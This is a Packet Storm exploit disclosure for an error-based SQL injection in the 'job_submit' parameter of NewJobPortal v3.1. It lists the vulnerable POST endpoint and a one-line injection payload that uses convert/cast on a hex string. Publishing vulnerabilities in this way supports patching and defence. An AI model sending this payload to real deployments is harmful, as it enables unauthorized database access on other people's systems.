Job Portal 3.1 SQL Injection

2019-03-29T00:00:00
ID PACKETSTORM:152299
Type packetstorm
Reporter Mehmet Emiroglu
Modified 2019-03-29T00:00:00

Description

                                        
                                            `===========================================================================================  
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.  
# Dork: N/A  
# Date: 25-03-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095  
# Version: v3.1  
# Category: Webapps  
# Tested on: Wamp64, Windows  
# CVE: N/A  
# Software Description: Job portal is developed for creating an interactive  
job vacancy for candidates.  
This web application is to be conceived in its current form as a dynamic  
site-requiring constant  
updates both from the seekers as well as the companies.  
===========================================================================================  
# POC - SQLi  
# Parameters : job_submit  
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))  
# POST Method : http://localhost/newjobportal/job_search/search  
===========================================================================================  
`